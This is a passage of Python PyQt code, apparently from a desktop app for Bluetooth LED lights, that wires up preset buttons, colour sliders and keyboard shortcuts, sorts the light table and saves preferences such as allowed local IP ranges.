self.lightTable.horizontalHeaderItem(1).setText("Light UUID")
# IF ANY OF THE CUSTOM PRESETS ARE ACTUALLY CUSTOM, THEN MARK THOSE BUTTONS AS CUSTOM
if customLightPresets[0] != defaultLightPresets[0]:
if customLightPresets[0][0][0] == -1: # if the current preset is custom, but a global, mark it that way
self.customPreset_0_Button.markCustom(0)
else: # the current preset is a snapshot preset
self.customPreset_0_Button.markCustom(0, 1)
if customLightPresets[1] != defaultLightPresets[1]:
if customLightPresets[1][0][0] == -1:
self.customPreset_1_Button.markCustom(1)
else:
self.customPreset_1_Button.markCustom(1, 1)
if customLightPresets[2] != defaultLightPresets[2]:
if customLightPresets[2][0][0] == -1:
self.customPreset_2_Button.markCustom(2)
else:
self.customPreset_2_Button.markCustom(2, 1)
if customLightPresets[3] != defaultLightPresets[3]:
if customLightPresets[3][0][0] == -1:
self.customPreset_3_Button.markCustom(3)
else:
self.customPreset_3_Button.markCustom(3, 1)
if customLightPresets[4] != defaultLightPresets[4]:
if customLightPresets[4][0][0] == -1:
self.customPreset_4_Button.markCustom(4)
else:
self.customPreset_4_Button.markCustom(4, 1)
if customLightPresets[5] != defaultLightPresets[5]:
if customLightPresets[5][0][0] == -1:
self.customPreset_5_Button.markCustom(5)
else:
self.customPreset_5_Button.markCustom(5, 1)
if customLightPresets[6] != defaultLightPresets[6]:
if customLightPresets[6][0][0] == -1:
self.customPreset_6_Button.markCustom(6)
else:
self.customPreset_6_Button.markCustom(6, 1)
if customLightPresets[7] != defaultLightPresets[7]:
if customLightPresets[7][0][0] == -1:
self.customPreset_7_Button.markCustom(7)
else:
self.customPreset_7_Button.markCustom(7, 1)
self.show
def connectMe(self):
self.turnOffButton.clicked.connect(self.turnLightOff)
self.turnOnButton.clicked.connect(self.turnLightOn)
self.scanCommandButton.clicked.connect(self.startSelfSearch)
self.tryConnectButton.clicked.connect(self.startConnect)
self.ColorModeTabWidget.currentChanged.connect(self.tabChanged)
self.lightTable.itemSelectionChanged.connect(self.selectionChanged)
# Allow clicking on the headers for sorting purposes
horizHeaders = self.lightTable.horizontalHeader()
horizHeaders.setSectionsClickable(True)
horizHeaders.sectionClicked.connect(self.sortByHeader)
# COMMENTS ARE THE SAME THE ENTIRE WAY DOWN THIS CHAIN
self.customPreset_0_Button.clicked.connect(lambda: recallCustomPreset(0)) # when you click a preset
self.customPreset_0_Button.rightclicked.connect(lambda: self.saveCustomPresetDialog(0)) # when you right-click a preset
self.customPreset_0_Button.enteredWidget.connect(lambda: self.highlightLightsForSnapshotPreset(0)) # when the mouse enters the widget
self.customPreset_0_Button.leftWidget.connect(lambda: self.highlightLightsForSnapshotPreset(0, True)) # when the mouse leaves the widget
self.customPreset_1_Button.clicked.connect(lambda: recallCustomPreset(1))
self.customPreset_1_Button.rightclicked.connect(lambda: self.saveCustomPresetDialog(1))
self.customPreset_1_Button.enteredWidget.connect(lambda: self.highlightLightsForSnapshotPreset(1))
self.customPreset_1_Button.leftWidget.connect(lambda: self.highlightLightsForSnapshotPreset(1, True))
self.customPreset_2_Button.clicked.connect(lambda: recallCustomPreset(2))
self.customPreset_2_Button.rightclicked.connect(lambda: self.saveCustomPresetDialog(2))
self.customPreset_2_Button.enteredWidget.connect(lambda: self.highlightLightsForSnapshotPreset(2))
self.customPreset_2_Button.leftWidget.connect(lambda: self.highlightLightsForSnapshotPreset(2, True))
self.customPreset_3_Button.clicked.connect(lambda: recallCustomPreset(3))
self.customPreset_3_Button.rightclicked.connect(lambda: self.saveCustomPresetDialog(3))
self.customPreset_3_Button.enteredWidget.connect(lambda: self.highlightLightsForSnapshotPreset(3))
self.customPreset_3_Button.leftWidget.connect(lambda: self.highlightLightsForSnapshotPreset(3, True))
self.customPreset_4_Button.clicked.connect(lambda: recallCustomPreset(4))
self.customPreset_4_Button.rightclicked.connect(lambda: self.saveCustomPresetDialog(4))
self.customPreset_4_Button.enteredWidget.connect(lambda: self.highlightLightsForSnapshotPreset(4))
self.customPreset_4_Button.leftWidget.connect(lambda: self.highlightLightsForSnapshotPreset(4, True))
self.customPreset_5_Button.clicked.connect(lambda: recallCustomPreset(5))
self.customPreset_5_Button.rightclicked.connect(lambda: self.saveCustomPresetDialog(5))
self.customPreset_5_Button.enteredWidget.connect(lambda: self.highlightLightsForSnapshotPreset(5))
self.customPreset_5_Button.leftWidget.connect(lambda: self.highlightLightsForSnapshotPreset(5, True))
self.customPreset_6_Button.clicked.connect(lambda: recallCustomPreset(6))
self.customPreset_6_Button.rightclicked.connect(lambda: self.saveCustomPresetDialog(6))
self.customPreset_6_Button.enteredWidget.connect(lambda: self.highlightLightsForSnapshotPreset(6))
self.customPreset_6_Button.leftWidget.connect(lambda: self.highlightLightsForSnapshotPreset(6, True))
self.customPreset_7_Button.clicked.connect(lambda: recallCustomPreset(7))
self.customPreset_7_Button.rightclicked.connect(lambda: self.saveCustomPresetDialog(7))
self.customPreset_7_Button.enteredWidget.connect(lambda: self.highlightLightsForSnapshotPreset(7))
self.customPreset_7_Button.leftWidget.connect(lambda: self.highlightLightsForSnapshotPreset(7, True))
self.Slider_CCT_Hue.valueChanged.connect(lambda: self.computeValueCCT(2))
self.Slider_CCT_Bright.valueChanged.connect(lambda: self.computeValueCCT(1))
self.Slider_HSI_1_H.valueChanged.connect(self.computeValueHSI)
self.Slider_HSI_2_S.valueChanged.connect(self.computeValueHSI)
self.Slider_HSI_3_L.valueChanged.connect(self.computeValueHSI)
self.Slider_ANM_Brightness.valueChanged.connect(lambda: self.computeValueANM(0))
self.Button_1_police_A.clicked.connect(lambda: self.computeValueANM(1))
self.Button_1_police_B.clicked.connect(lambda: self.computeValueANM(2))
self.Button_1_police_C.clicked.connect(lambda: self.computeValueANM(3))
self.Button_2_party_A.clicked.connect(lambda: self.computeValueANM(4))
self.Button_2_party_B.clicked.connect(lambda: self.computeValueANM(5))
self.Button_2_party_C.clicked.connect(lambda: self.computeValueANM(6))
self.Button_3_lightning_A.clicked.connect(lambda: self.computeValueANM(7))
self.Button_3_lightning_B.clicked.connect(lambda: self.computeValueANM(8))
self.Button_3_lightning_C.clicked.connect(lambda: self.computeValueANM(9))
self.saveLightPrefsButton.clicked.connect(self.checkLightPrefs)
self.resetGlobalPrefsButton.clicked.connect(lambda: self.setupGlobalLightPrefsTab(True))
self.saveGlobalPrefsButton.clicked.connect(self.saveGlobalPrefs)
# SHORTCUT KEYS - MAKE THEM HERE, SET THEIR ASSIGNMENTS BELOW WITH self.setupShortcutKeys()
# IN CASE WE NEED TO CHANGE THEM AFTER CHANGING PREFERENCES
self.SC_turnOffButton = QShortcut(self)
self.SC_turnOnButton = QShortcut(self)
self.SC_scanCommandButton = QShortcut(self)
self.SC_tryConnectButton = QShortcut(self)
self.SC_Tab_CCT = QShortcut(self)
self.SC_Tab_HSI = QShortcut(self)
self.SC_Tab_SCENE = QShortcut(self)
self.SC_Tab_PREFS = QShortcut(self)
# DECREASE/INCREASE BRIGHTNESS REGARDLESS OF WHICH TAB WE'RE ON
self.SC_Dec_Bri_Small = QShortcut(self)
self.SC_Inc_Bri_Small = QShortcut(self)
self.SC_Dec_Bri_Large = QShortcut(self)
self.SC_Inc_Bri_Large = QShortcut(self)
# THE SMALL INCREMENTS *DO* NEED A CUSTOM FUNCTION, BUT ONLY IF WE CHANGE THE
# SHORTCUT ASSIGNMENT TO SOMETHING OTHER THAN THE NORMAL NUMBERS
# THE LARGE INCREMENTS DON'T NEED A CUSTOM FUNCTION
self.SC_Dec_1_Small = QShortcut(self)
self.SC_Inc_1_Small = QShortcut(self)
self.SC_Dec_2_Small = QShortcut(self)
self.SC_Inc_2_Small = QShortcut(self)
self.SC_Dec_3_Small = QShortcut(self)
self.SC_Inc_3_Small = QShortcut(self)
self.SC_Dec_1_Large = QShortcut(self)
self.SC_Inc_1_Large = QShortcut(self)
self.SC_Dec_2_Large = QShortcut(self)
self.SC_Inc_2_Large = QShortcut(self)
self.SC_Dec_3_Large = QShortcut(self)
self.SC_Inc_3_Large = QShortcut(self)
self.setupShortcutKeys() # set up the shortcut keys for the first time
# CONNECT THE KEYS TO THEIR FUNCTIONS
self.SC_turnOffButton.activated.connect(self.turnLightOff)
self.SC_turnOnButton.activated.connect(self.turnLightOn)
self.SC_scanCommandButton.activated.connect(self.startSelfSearch)
self.SC_tryConnectButton.activated.connect(self.startConnect)
self.SC_Tab_CCT.activated.connect(lambda: self.switchToTab(0))
self.SC_Tab_HSI.activated.connect(lambda: self.switchToTab(1))
self.SC_Tab_SCENE.activated.connect(lambda: self.switchToTab(2))
self.SC_Tab_PREFS.activated.connect(lambda: self.switchToTab(3))
# DECREASE/INCREASE BRIGHTNESS REGARDLESS OF WHICH TAB WE'RE ON
self.SC_Dec_Bri_Small.activated.connect(lambda: self.changeSliderValue(0, -1))
self.SC_Inc_Bri_Small.activated.connect(lambda: self.changeSliderValue(0, 1))
self.SC_Dec_Bri_Large.activated.connect(lambda: self.changeSliderValue(0, -5))
self.SC_Inc_Bri_Large.activated.connect(lambda: self.changeSliderValue(0, 5))
# THE SMALL INCREMENTS DO NEED A SPECIAL FUNCTION-
# (see above) - BASICALLY, IF THEY'RE JUST ASSIGNED THE DEFAULT NUMPAD/NUMBER VALUES
# THESE FUNCTIONS DON'T TRIGGER (THE SAME FUNCTIONS ARE HANDLED BY numberShortcuts(n))
# BUT IF THEY ARE CUSTOM, *THEN* THESE TRIGGER INSTEAD, AND THIS FUNCTION ^^^^ JUST DOES
# SCENE SELECTIONS IN SCENE MODE
self.SC_Dec_1_Small.activated.connect(lambda: self.changeSliderValue(1, -1))
self.SC_Inc_1_Small.activated.connect(lambda: self.changeSliderValue(1, 1))
self.SC_Dec_2_Small.activated.connect(lambda: self.changeSliderValue(2, -1))
self.SC_Inc_2_Small.activated.connect(lambda: self.changeSliderValue(2, 1))
self.SC_Dec_3_Small.activated.connect(lambda: self.changeSliderValue(3, -1))
self.SC_Inc_3_Small.activated.connect(lambda: self.changeSliderValue(3, 1))
# THE LARGE INCREMENTS DON'T NEED A CUSTOM FUNCTION
self.SC_Dec_1_Large.activated.connect(lambda: self.changeSliderValue(1, -5))
self.SC_Inc_1_Large.activated.connect(lambda: self.changeSliderValue(1, 5))
self.SC_Dec_2_Large.activated.connect(lambda: self.changeSliderValue(2, -5))
self.SC_Inc_2_Large.activated.connect(lambda: self.changeSliderValue(2, 5))
self.SC_Dec_3_Large.activated.connect(lambda: self.changeSliderValue(3, -5))
self.SC_Inc_3_Large.activated.connect(lambda: self.changeSliderValue(3, 5))
# THE NUMPAD SHORTCUTS ARE SET UP REGARDLESS OF WHAT THE CUSTOM INC/DEC SHORTCUTS ARE
self.SC_Num1 = QShortcut(QKeySequence("1"), self)
self.SC_Num1.activated.connect(lambda: self.numberShortcuts(1))
self.SC_Num2 = QShortcut(QKeySequence("2"), self)
self.SC_Num2.activated.connect(lambda: self.numberShortcuts(2))
self.SC_Num3 = QShortcut(QKeySequence("3"), self)
self.SC_Num3.activated.connect(lambda: self.numberShortcuts(3))
self.SC_Num4 = QShortcut(QKeySequence("4"), self)
self.SC_Num4.activated.connect(lambda: self.numberShortcuts(4))
self.SC_Num5 = QShortcut(QKeySequence("5"), self)
self.SC_Num5.activated.connect(lambda: self.numberShortcuts(5))
self.SC_Num6 = QShortcut(QKeySequence("6"), self)
self.SC_Num6.activated.connect(lambda: self.numberShortcuts(6))
self.SC_Num7 = QShortcut(QKeySequence("7"), self)
self.SC_Num7.activated.connect(lambda: self.numberShortcuts(7))
self.SC_Num8 = QShortcut(QKeySequence("8"), self)
self.SC_Num8.activated.connect(lambda: self.numberShortcuts(8))
self.SC_Num9 = QShortcut(QKeySequence("9"), self)
self.SC_Num9.activated.connect(lambda: self.numberShortcuts(9))
def sortByHeader(self, theHeader):
global availableLights
global lastSortingField
if theHeader < 2: # if we didn't click on the "Linked" or "Status" headers, start processing the sort
sortingList = [] # a copy of the availableLights array
checkForCustomNames = False # whether or not to ask to sort by custom names (if there aren't any custom names, then don't allow)
for a in range(len(availableLights)): # copy the entire availableLights array into a temporary array to process it
if theHeader == 0 and availableLights[a][2] != "": # if the current light has a custom name (and we clicked on Name)
checkForCustomNames = True # then we need to ask what kind of sorting when we sort
sortingList.append([availableLights[a][0], availableLights[a][1], availableLights[a][2], availableLights[a][3], \
availableLights[a][4], availableLights[a][5], availableLights[a][6], availableLights[a][7], \
availableLights[a][0].name, availableLights[a][0].address, availableLights[a][0].rssi])
else: # we clicked on the "Linked" or "Status" headers, which do not allow sorting
sortingField = -1
if theHeader == 0:
sortDlg = QMessageBox(self)
sortDlg.setIcon(QMessageBox.Question)
sortDlg.setWindowTitle("Sort by...")
sortDlg.setText("Which do you want to sort by?")
sortDlg.addButton(" RSSI (Signal Level) ", QMessageBox.ButtonRole.AcceptRole)
sortDlg.addButton(" Type of Light ", QMessageBox.ButtonRole.AcceptRole)
if checkForCustomNames == True: # if we have custom names available, then add that as an option
sortDlg.addButton("Custom Name", QMessageBox.ButtonRole.AcceptRole)
sortDlg.addButton("Cancel", QMessageBox.ButtonRole.RejectRole)
sortDlg.setIcon(QMessageBox.Warning)
clickedButton = sortDlg.exec_()
if clickedButton == 0:
sortingField = 10 # sort by RSSI
elif clickedButton == 1:
sortingField = 8 # sort by type of light
elif clickedButton == 2:
if checkForCustomNames == True: # if the option was available for custom names, this is "custom name"
sortingField = 2
else: # if the option wasn't available, then this is "cancel"
sortingField = -1 # cancel out of sorting - write this!
elif clickedButton == 3: # this option is only available if custom names is accessible - if so, this is "cancel"
sortingField = -1 # cancel out of sorting - write this!
elif theHeader == 1: # sort by MAC Address/GUID
sortingField = 9
if sortingField != -1: # we want to sort
self.lightTable.horizontalHeader().setSortIndicatorShown(True) # show the sorting indicator
if lastSortingField != sortingField: # if we're doing a different kind of sort than the last one
self.lightTable.horizontalHeader().setSortIndicator(theHeader, Qt.SortOrder.AscendingOrder) # force the header to "Ascending" order
if sortingField != 10: # if we're not looking at RSSI
doReverseSort = False # we need an ascending order search
else: # we ARE looking at RSSI
doReverseSort = True # if we're looking at RSSI, then the search order is reversed (as the smaller # is actually the higher value)
else: # if it's the same as before, then take the cue from the last order
if self.lightTable.horizontalHeader().sortIndicatorOrder() == Qt.SortOrder.DescendingOrder:
if sortingField != 10:
doReverseSort = True
else:
doReverseSort = False
elif self.lightTable.horizontalHeader().sortIndicatorOrder() == Qt.SortOrder.AscendingOrder:
if sortingField != 10:
doReverseSort = False
else:
doReverseSort = True
sortedList = sorted(sortingList, key = lambda x: x[sortingField], reverse = doReverseSort) # sort the list
availableLights.clear() # clear the list of available lights
for a in range(len(sortedList)): # rebuild the available lights list from the sorted list
availableLights.append([sortedList[a][0], sortedList[a][1], sortedList[a][2], sortedList[a][3], \
sortedList[a][4], sortedList[a][5], sortedList[a][6], sortedList[a][7]])
self.updateLights(False) # redraw the table with the new light list
lastSortingField = sortingField # keep track of the last field used for sorting, so we know whether or not to switch to ascending
else:
self.lightTable.horizontalHeader().setSortIndicatorShown(False) # hide the sorting indicator
def switchToTab(self, theTab): # SWITCH TO THE REQUESTED TAB **IF IT IS AVAILABLE**
if self.ColorModeTabWidget.isTabEnabled(theTab) == True:
self.ColorModeTabWidget.setCurrentIndex(theTab)
def numberShortcuts(self, theNumber):
# THE KEYS (IF THERE AREN'T CUSTOM ONES SET UP):
# 7 AND 9 ADJUST THE FIRST SLIDER ON A TAB
# 4 AND 6 ADJUST THE SECOND SLIDER ON A TAB
# 1 AND 3 ADJUST THE THIRD SLIDER ON A TAB
# UNLESS WE'RE IN SCENE MODE, THEN THEY JUST SWITCH THE SCENE
if theNumber == 1:
if self.ColorModeTabWidget.currentIndex() == 2: # if we're on the SCENE tab, then the number keys correspond to an animation
self.computeValueANM(1)
else: # if we're not, adjust the slider
if customKeys[16] == "1":
self.changeSliderValue(3, -1) # decrement slider 3
elif theNumber == 2:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(2)
elif theNumber == 3:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(3)
else:
if customKeys[17] == "3":
self.changeSliderValue(3, 1) # increment slider 3
elif theNumber == 4:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(4)
else:
if customKeys[14] == "4":
self.changeSliderValue(2, -1) # decrement slider 2
elif theNumber == 5:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(5)
elif theNumber == 6:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(6)
else:
if customKeys[15] == "6":
self.changeSliderValue(2, 1) # increment slider 2
elif theNumber == 7:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(7)
else:
if customKeys[12] == "7":
self.changeSliderValue(1, -1) # decrement slider 1
elif theNumber == 8:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(8)
elif theNumber == 9:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(9)
else:
if customKeys[13] == "9":
self.changeSliderValue(1, 1) # increment slider 1
def changeSliderValue(self, sliderToChange, changeAmt):
if self.ColorModeTabWidget.currentIndex() == 0: # we have 2 sliders in CCT mode
if sliderToChange == 1:
self.Slider_CCT_Hue.setValue(self.Slider_CCT_Hue.value() + changeAmt)
elif sliderToChange == 2 or sliderToChange == 0:
self.Slider_CCT_Bright.setValue(self.Slider_CCT_Bright.value() + changeAmt)
elif self.ColorModeTabWidget.currentIndex() == 1: # we have 3 sliders in HSI mode
if sliderToChange == 1:
self.Slider_HSI_1_H.setValue(self.Slider_HSI_1_H.value() + changeAmt)
elif sliderToChange == 2:
self.Slider_HSI_2_S.setValue(self.Slider_HSI_2_S.value() + changeAmt)
elif sliderToChange == 3 or sliderToChange == 0:
self.Slider_HSI_3_L.setValue(self.Slider_HSI_3_L.value() + changeAmt)
elif self.ColorModeTabWidget.currentIndex() == 2:
if sliderToChange == 0: # the only "slider" in SCENE mode is the brightness
self.Slider_ANM_Brightness.setValue(self.Slider_ANM_Brightness.value() + changeAmt)
def checkLightTab(self, selectedLight = -1):
if self.ColorModeTabWidget.currentIndex() == 0: # if we're on the CCT tab, do the check
if selectedLight == -1: # if we don't have a light selected
self.setupCCTBounds(56) # restore the bounds to their default of 56(00)K
else:
if availableLights[selectedLight][4] == True: # if we're supposed to be extending the range
if self.Slider_CCT_Hue.maximum() == 56: # if we're set to extend the range, but we're still set to 56(00)K, then change the range
self.setupCCTBounds(85)
else:
if self.Slider_CCT_Hue.maximum() == 85: # if we're set to NOT extend the range, but we're still set to 85(00)K, then reduce the range
self.setupCCTBounds(56)
elif self.ColorModeTabWidget.currentIndex() == 3: # if we're on the Preferences tab instead
if selectedLight != -1: # if there is a specific selected light
self.setupLightPrefsTab(selectedLight) # update the Prefs tab with the information for that selected light
def setupCCTBounds(self, gradientBounds):
self.Slider_CCT_Hue.setMaximum(gradientBounds) # set the max value of the color temperature slider to the new max bounds
gradient = QLinearGradient(0, 0, 532, 31)
# SET GRADIENT OF CCT SLIDER IN CHUNKS OF 5 VALUES BASED ON BOUNDARY
if gradientBounds == 56: # the color temperature boundary is 5600K
gradient.setColorAt(0.0, QColor(255, 187, 120, 255)) # 3200K
gradient.setColorAt(0.25, QColor(255, 204, 153, 255)) # 3800K
gradient.setColorAt(0.50, QColor(255, 217, 182, 255)) # 4400K
gradient.setColorAt(0.75, QColor(255, 228, 206, 255)) # 5000K
gradient.setColorAt(1.0, QColor(255, 238, 227, 255)) # 5600K
else: # the color temperature boundary is 8500K
gradient.setColorAt(0.0, QColor(255, 187, 120, 255)) # 3200K
gradient.setColorAt(0.25, QColor(255, 219, 186, 255)) # 4500K
gradient.setColorAt(0.50, QColor(255, 240, 233, 255)) # 5800K
gradient.setColorAt(0.75, QColor(243, 242, 255, 255)) # 7100K
gradient.setColorAt(1.0, QColor(220, 229, 255, 255)) # 8500K
self.CCT_Temp_Gradient_BG.scene().setBackgroundBrush(gradient) # change the gradient to fit the new boundary
def setupLightPrefsTab(self, selectedLight):
self.customNameTF.setText(availableLights[selectedLight][2]) # set the "custom name" field to the custom name of this light
# IF THE OPTION TO ALLOW WIDER COLOR TEMPERATURES IS ENABLED, THEN ENABLE THAT CHECKBOX
if availableLights[selectedLight][4] == True:
self.widerRangeCheck.setChecked(True)
else:
self.widerRangeCheck.setChecked(False)
# IF THE OPTION TO SEND ONLY CCT MODE IS ENABLED, THEN ENABLE THAT CHECKBOX
if availableLights[selectedLight][5] == True:
self.onlyCCTModeCheck.setChecked(True)
else:
self.onlyCCTModeCheck.setChecked(False)
def setupGlobalLightPrefsTab(self, setDefault=False):
if setDefault == False:
self.findLightsOnStartup_check.setChecked(findLightsOnStartup)
self.autoConnectToLights_check.setChecked(autoConnectToLights)
self.printDebug_check.setChecked(printDebug)
self.rememberLightsOnExit_check.setChecked(rememberLightsOnExit)
self.rememberPresetsOnExit_check.setChecked(rememberPresetsOnExit)
self.maxNumOfAttempts_field.setText(str(maxNumOfAttempts))
self.acceptable_HTTP_IPs_field.setText("\n".join(acceptable_HTTP_IPs))
self.whiteListedMACs_field.setText("\n".join(whiteListedMACs))
self.SC_turnOffButton_field.setKeySequence(customKeys[0])
self.SC_turnOnButton_field.setKeySequence(customKeys[1])
self.SC_scanCommandButton_field.setKeySequence(customKeys[2])
self.SC_tryConnectButton_field.setKeySequence(customKeys[3])
self.SC_Tab_CCT_field.setKeySequence(customKeys[4])
self.SC_Tab_HSI_field.setKeySequence(customKeys[5])
self.SC_Tab_SCENE_field.setKeySequence(customKeys[6])
self.SC_Tab_PREFS_field.setKeySequence(customKeys[7])
self.SC_Dec_Bri_Small_field.setKeySequence(customKeys[8])
self.SC_Inc_Bri_Small_field.setKeySequence(customKeys[9])
self.SC_Dec_Bri_Large_field.setKeySequence(customKeys[10])
self.SC_Inc_Bri_Large_field.setKeySequence(customKeys[11])
self.SC_Dec_1_Small_field.setKeySequence(customKeys[12])
self.SC_Inc_1_Small_field.setKeySequence(customKeys[13])
self.SC_Dec_2_Small_field.setKeySequence(customKeys[14])
self.SC_Inc_2_Small_field.setKeySequence(customKeys[15])
self.SC_Dec_3_Small_field.setKeySequence(customKeys[16])
self.SC_Inc_3_Small_field.setKeySequence(customKeys[17])
self.SC_Dec_1_Large_field.setKeySequence(customKeys[18])
self.SC_Inc_1_Large_field.setKeySequence(customKeys[19])
self.SC_Dec_2_Large_field.setKeySequence(customKeys[20])
self.SC_Inc_2_Large_field.setKeySequence(customKeys[21])
self.SC_Dec_3_Large_field.setKeySequence(customKeys[22])
self.SC_Inc_3_Large_field.setKeySequence(customKeys[23])
else: # if you clicked the RESET button, reset all preference values to their defaults
self.findLightsOnStartup_check.setChecked(True)
self.autoConnectToLights_check.setChecked(True)
self.printDebug_check.setChecked(True)
self.rememberLightsOnExit_check.setChecked(False)
self.rememberPresetsOnExit_check.setChecked(True)
self.maxNumOfAttempts_field.setText("6")
self.acceptable_HTTP_IPs_field.setText("\n".join(["127.0.0.1", "192.168", "10.0.0"]))
self.whiteListedMACs_field.setText("")
self.SC_turnOffButton_field.setKeySequence("Ctrl+PgDown")
self.SC_turnOnButton_field.setKeySequence("Ctrl+PgUp")
self.SC_scanCommandButton_field.setKeySequence("Ctrl+Shift+S")
self.SC_tryConnectButton_field.setKeySequence("Ctrl+Shift+C")
self.SC_Tab_CCT_field.setKeySequence("Alt+1")
self.SC_Tab_HSI_field.setKeySequence("Alt+2")
self.SC_Tab_SCENE_field.setKeySequence("Alt+3")
self.SC_Tab_PREFS_field.setKeySequence("Alt+4")
self.SC_Dec_Bri_Small_field.setKeySequence("/")
self.SC_Inc_Bri_Small_field.setKeySequence("*")
self.SC_Dec_Bri_Large_field.setKeySequence("Ctrl+/")
self.SC_Inc_Bri_Large_field.setKeySequence("Ctrl+*")
self.SC_Dec_1_Small_field.setKeySequence("7")
self.SC_Inc_1_Small_field.setKeySequence("9")
self.SC_Dec_2_Small_field.setKeySequence("4")
self.SC_Inc_2_Small_field.setKeySequence("6")
self.SC_Dec_3_Small_field.setKeySequence("1")
self.SC_Inc_3_Small_field.setKeySequence("3")
self.SC_Dec_1_Large_field.setKeySequence("Ctrl+7")
self.SC_Inc_1_Large_field.setKeySequence("Ctrl+9")
self.SC_Dec_2_Large_field.setKeySequence("Ctrl+4")
self.SC_Inc_2_Large_field.setKeySequence("Ctrl+6")
self.SC_Dec_3_Large_field.setKeySequence("Ctrl+1")
self.SC_Inc_3_Large_field.setKeySequence("Ctrl+3")
def saveGlobalPrefs(self):
# change these global values to the new values in Prefs
global customKeys, autoConnectToLights, printDebug, rememberLightsOnExit, rememberPresetsOnExit, maxNumOfAttempts, acceptable_HTTP_IPs, whiteListedMACs
finalPrefs = [] # list of final prefs to merge together at the end
if not self.findLightsOnStartup_check.isChecked(): # this option is usually on, so only add on false
finalPrefs.append("findLightsOnStartup=0")
if not self.autoConnectToLights_check.isChecked(): # this option is usually on, so only add on false
autoConnectToLights = False
finalPrefs.append("autoConnectToLights=0")
else:
autoConnectToLights = True
if not self.printDebug_check.isChecked(): # this option is usually on, so only add on false
printDebug = False
finalPrefs.append("printDebug=0")
else:
printDebug = True
if self.rememberLightsOnExit_check.isChecked(): # this option is usually off, so only add on true
rememberLightsOnExit = True
finalPrefs.append("rememberLightsOnExit=1")
else:
rememberLightsOnExit = False
if not self.rememberPresetsOnExit_check.isChecked(): # this option is usually on, so only add if false
rememberPresetsOnExit = False
finalPrefs.append("rememberPresetsOnExit=0")
else:
rememberPresetsOnExit = True
if self.maxNumOfAttempts_field.text() != "6": # the default for this option is 6 attempts
maxNumOfAttempts = int(self.maxNumOfAttempts_field.text())
finalPrefs.append("maxNumOfAttempts=" + self.maxNumOfAttempts_field.text())
else:
maxNumOfAttempts = 6
# FIGURE OUT IF THE HTTP IP ADDRESSES HAVE CHANGED
returnedList_HTTP_IPs = self.acceptable_HTTP_IPs_field.toPlainText().split("\n")
if returnedList_HTTP_IPs != ["127.0.0.1", "192.168", "10.0.0"]: # if the list of HTTP IPs have changed
acceptable_HTTP_IPs = returnedList_HTTP_IPs # change the global HTTP IPs available
finalPrefs.append("acceptable_HTTP_IPs=" + ";".join(acceptable_HTTP_IPs)) # add the new ones to the preferences
else:
acceptable_HTTP_IPs = ["127.0.0.1", "192.168", "10.0.0"] # if we reset the IPs, then re-reset the parameter
# ADD WHITELISTED LIGHTS TO PREFERENCES IF THEY EXIST
returnedList_whiteListedMACs = self.whiteListedMACs_field.toPlainText().replace(" ", "").split("\n") # remove spaces and split on newlines
if returnedList_whiteListedMACs[0] != "": # if we have any MAC addresses specified
whiteListedMACs = returnedList_whiteListedMACs # then set the list to the addresses specified
finalPrefs.append("whiteListedMACs=" + ";".join(whiteListedMACs)) # add the new addresses to the preferences
else:
whiteListedMACs = [] # or clear the list
# SET THE NEW KEYBOARD SHORTCUTS TO THE VALUES IN PREFERENCES
customKeys[0] = self.SC_turnOffButton_field.keySequence().toString()
customKeys[1] = self.SC_turnOnButton_field.keySequence().toString()
customKeys[2] = self.SC_scanCommandButton_field.keySequence().toString()
customKeys[3] = self.SC_tryConnectButton_field.keySequence().toString()
customKeys[4] = self.SC_Tab_CCT_field.keySequence().toString()
customKeys[5] = self.SC_Tab_HSI_field.keySequence().toString()
customKeys[6] = self.SC_Tab_SCENE_field.keySequence().toString()
customKeys[7] = self.SC_Tab_PREFS_field.keySequence().toString()
customKeys[8] = self.SC_Dec_Bri_Small_field.keySequence().toString()
customKeys[9] = self.SC_Inc_Bri_Small_field.keySequence().toString()
customKeys[10] = self.SC_Dec_Bri_Large_field.keySequence().toString()
customKeys[11] = self.SC_Inc_Bri_Large_field.keySequence().toString()
customKeys[12] = self.SC_Dec_1_Small_field.keySequence().toString()
customKeys[13] = self.SC_Inc_1_Small_field.keySequence().toString()
customKeys[14] = self.SC_Dec_2_Small_field.keySequence().toString()
customKeys[15] = self.SC_Inc_2_Small_field.keySequence().toString()
customKeys[16] = self.SC_Dec_3_Small_field.keySequence().toString()
customKeys[17] = self.SC_Inc_3_Small_field.keySequence().toString()
customKeys[18] = self.SC_Dec_1_Large_field.keySequence().toString()
customKeys[19] = self.SC_Inc_1_Large_field.keySequence().toString()
customKeys[20] = self.SC_Dec_2_Large_field.keySequence().toString()
customKeys[21] = self.SC_Inc_2_Large_field.keySequence().toString()
customKeys[22] = self.SC_Dec_3_Large_field.keySequence().toString()
customKeys[23] = self.SC_Inc_3_Large_field.keySequence().toString()
self.setupShortcutKeys() # change shortcut key assignments to the new values in prefs
if customKeys[0] != "Ctrl+PgDown":
finalPrefs.append("SC_turnOffButton=" + customKeys[0])
if customKeys[1] != "Ctrl+PgUp":
finalPrefs.append("SC_turnOnButton=" + customKeys[1])
if customKeys[2] != "Ctrl+Shift+S":
finalPrefs.append("SC_scanCommandButton=" + customKeys[2])
if customKeys[3] != "Ctrl+Shift+C":
finalPrefs.append("SC_tryConnectButton=" + customKeys[3])
if customKeys[4] != "Alt+1":
finalPrefs.append("SC_Tab_CCT=" + customKeys[4])
if customKeys[5] != "Alt+2":
finalPrefs.append("SC_Tab_HSI=" + customKeys[5])
if customKeys[6] != "Alt+3":
finalPrefs.append("SC_Tab_SCENE=" + customKeys[6])
if customKeys[7] != "Alt+4":
finalPrefs.append("SC_Tab_PREFS=" + customKeys[7])
if customKeys[8] != "/":
finalPrefs.append("SC_Dec_Bri_Small=" + customKeys[8])
if customKeys[9] != "*":
finalPrefs.append("SC_Inc_Bri_Small=" + customKeys[9])
if customKeys[10] != "Ctrl+/":
finalPrefs.append("SC_Dec_Bri_Large=" + customKeys[10])
if customKeys[11] != "Ctrl+*":
finalPrefs.append("SC_Inc_Bri_Large=" + customKeys[11])
if customKeys[12] != "7":
finalPrefs.append("SC_Dec_1_Small=" + customKeys[12])
